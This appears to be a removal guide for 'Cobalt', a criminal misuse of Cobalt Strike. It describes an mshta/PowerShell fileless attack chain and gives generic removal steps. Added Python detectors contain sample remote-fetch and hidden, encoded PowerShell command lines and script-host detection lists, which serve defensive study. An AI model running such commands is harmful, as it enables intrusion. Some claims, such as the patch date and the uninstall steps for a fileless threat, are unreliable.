Remove Cobalt Completely From Infected PC (Removal Instructions)

Cobalt: Latest Investigation Report

Cobalt is a software product developed by Strategic Cyber LLC, a company founded by Raphael Mudge that is well known for building software and providing training for penetration testers. The official site of Cobalt is "hxxps://www.cobaltstrike.com". It is meant for adversary simulations, in which cyber criminals try to gain access to a protected environment using spear phishing and exploits for zero-day vulnerabilities. Somehow, however, malware developers managed to obtain the source code of the Cobalt penetration testing tool from Strategic Cyber LLC and modified it to suit their own needs and unwanted purposes. The first investigation report emerged on 28th November 2017. The threat actors ran a massive spam campaign that sent emails to a huge number of PC users, luring them into opening an RTF document that claimed to come from the Visa credit card issuer and to announce new payWave services.


A fake update runs together with a blank text file that carries an embedded PowerShell script; the script makes the system connect to "hyyp://104.254.99./x.txt" through the Microsoft HTML Application host, "mshta.exe". According to the malware researchers who raised the alert, the Cobalt group exploits a 17-year-old vulnerability in Microsoft Office, dubbed CVE-2017-11882, which was patched on 31st July 2017. The Windows operating system then downloads a JavaScript file that is loaded into system memory, and that file pulls the remaining components directly into memory as well. Because the infection lives only in RAM and no physical data is written to the compromised disk, Cobalt is well placed to evade detection by security scanners.
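As an added example (not code from the original page or from any vendor), the following Python applies the detection logic a defender would want for the chain just described: an Office process launching mshta.exe with a remote URL, and mshta.exe in turn launching hidden or encoded PowerShell. The Sysmon-style events, file paths, IP address and rule names are all constructed for the example.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation events (Event ID 1 fields); not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://203.0.113.5/x.txt"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -w hidden -enc SQBFAFgA"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\alice\AppData\Local\app.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.rtf"'},
]

# Office binaries (EQNEDT32.EXE is the Equation Editor component targeted by CVE-2017-11882)
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
# Script hosts that should rarely be children of an Office application
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
PS_FLAGS_RE = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|e(?:nc(?:odedcommand)?)?\b|nop(?:rofile)?\b)",
                         re.IGNORECASE)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> List[str]:
    """Return the rule names an event matches; an empty list means nothing suspicious."""
    parent, image, cmd = basename(event["ParentImage"]), basename(event["Image"]), event["CommandLine"]
    hits = []
    if parent in OFFICE and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_content")          # HTA pulled from the network
    if image == "powershell.exe" and PS_FLAGS_RE.search(cmd):
        hits.append("powershell_hidden_or_encoded")  # fileless stage run from memory
    if parent == "mshta.exe" and image == "powershell.exe":
        hits.append("mshta_spawns_powershell")
    return hits

def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> matched rules, keeping only events that matched something."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}
```

A local HTA started by explorer.exe and a user opening a document in Word both pass cleanly, which is what keeps the parent/child rule usable in production.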

Once the Trojan gains access to the system, it sends a POST request to its Command & Control server, which acts as a beacon. This threat may perform various actions, such as:

  • Add new rules to the existing system firewall.
  • Exploit 0-day vulnerabilities.
  • Record keystrokes.
  • Gather hashes and collect auto-fill data from your favourite web browsers and instant-messaging clients.
  • Inject additional unwanted processes into already running processes, consuming more system resources and slowing the system down.
  • Delete, corrupt or move files and folders from one location to another without your consent.
  • Deploy covert VPN clients.
  • Download and install programs without the user's permission.
  • Disable system programs and their functionality.

You should therefore use a reliable anti-malware product to remove Cobalt from the system so that it can be used securely again.


How to Remove Cobalt from Compromised PC (Manual Steps)

(This guide is intended to help users follow step-by-step instructions to make Windows safe.)

The first step is to restart the Windows PC in Safe Mode.

Reboot in Safe Mode (For Windows XP | Vista | Win7)

  1. Restart the computer.
  2. Tap F8 repeatedly as the PC starts booting and select Safe Mode with Networking.


For Windows 8/8.1

  1. Click the Start button and choose Control Panel from the menu.
  2. Select System and Security, then Administrative Tools, and then System Configuration.
  3. Next, tick the Safe Boot option and click OK; in the pop-up window that appears, select Restart.

For Windows 10

  1. Open the Start Menu.
  2. Click the power button icon in the right corner to display the power options menu.
  3. Hold the SHIFT key and select Restart. This reboots Windows 10.
  4. Select Troubleshoot, then Advanced options, then Startup Settings, and click Restart. When the boot options appear, select Enable Safe Mode with Networking.

Step 2: End Cobalt Processes in Task Manager on Windows

How to end the running processes related to Cobalt using Task Manager

  1. Open Task Manager by pressing Ctrl+Shift+Esc together.
  2. Click the Processes tab and find Cobalt.
  3. Select it and click End Process to terminate Cobalt.


Step 3: How to Uninstall Cobalt from Control Panel on Windows

For Windows XP, Vista and Windows 7 users

  1. Click the Start Menu.
  2. Select Control Panel from the list.
  3. Click Uninstall a Program.
  4. Choose the suspicious program related to Cobalt and right-click it.
  5. Finally, select Uninstall.


For Windows 8

  • Open the Charms bar.
  • Select Settings.
  • Click Control Panel.
  • Select Uninstall a Program, right-click the program associated with Cobalt and uninstall it.


For Windows 10

  1. Click the Start Menu.
  2. Click All Apps.
  3. Find Cobalt and any other suspicious program in the full list.
  4. Right-click Cobalt and uninstall it from Windows 10.


Step 4: How to Delete Cobalt-Created Entries from the Registry

  • Open the Registry Editor by typing Regedit in the Windows search field and pressing Enter.
  • This opens the registry entries. Press CTRL + F and type Cobalt to find the entries.
  • Once located, delete all entries named Cobalt. If you cannot find them, look them up manually in the locations below. Be careful and delete only Cobalt entries; removing anything else can severely damage your Windows computer.
    HKEY_CURRENT_USER\Software\<Random Directory>
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\<Random>
    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\<Random>
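As an added example (not part of the original guide), the following Python triages a regedit export (File > Export) of the Run key named above instead of eyeballing it: it parses the .reg text format and flags autostart values that launch a script host such as mshta.exe or PowerShell, reference a remote URL, or use hidden or encoded PowerShell switches. The export text, value names and IP address are constructed.

```python
import re

# Constructed regedit export (File > Export) of the Run key; not taken from a real host.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="mshta.exe http://203.0.113.5/x.txt"
"Svc"="powershell.exe -w hidden -enc SQBFAFgA"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="https://www.example.com/"
'''

KEY_RE = re.compile(r"^\[(.+)\]$")
# "name"="data" lines; .reg escapes backslash and double quote with a backslash
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
SCRIPT_HOSTS = ("mshta", "powershell", "wscript", "cscript", "regsvr32", "rundll32")
URL_RE = re.compile(r"https?://", re.IGNORECASE)
PS_FLAGS_RE = re.compile(r"-(?:w\s+hidden|enc)\b", re.IGNORECASE)

def unescape(s):
    return re.sub(r"\\(.)", r"\1", s)  # undo .reg escaping of \\ and \"

def parse_reg(text):
    """Yield (key, value_name, string_data) for every REG_SZ value in a .reg export."""
    key = None
    for line in (raw.strip() for raw in text.splitlines()):
        if m := KEY_RE.match(line):
            key = m.group(1)
        elif (m := VALUE_RE.match(line)) and key is not None:
            yield key, unescape(m.group(1)), unescape(m.group(2))

def suspicious_autoruns(text):
    """Return (value_name, command, reasons) for Run/RunOnce values worth a closer look."""
    findings = []
    for key, name, data in parse_reg(text):
        if not key.lower().endswith(("\\run", "\\runonce")):
            continue  # only autostart keys matter for this check
        reasons = []
        if any(host in data.lower() for host in SCRIPT_HOSTS):
            reasons.append("script_host")
        if URL_RE.search(data):
            reasons.append("remote_url")
        if PS_FLAGS_RE.search(data):
            reasons.append("hidden_or_encoded")
        if reasons:
            findings.append((name, data, reasons))
    return findings
```

The legitimate OneDrive entry is left alone, which matches the guide's warning to delete only the entries you have actually tied to the infection.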
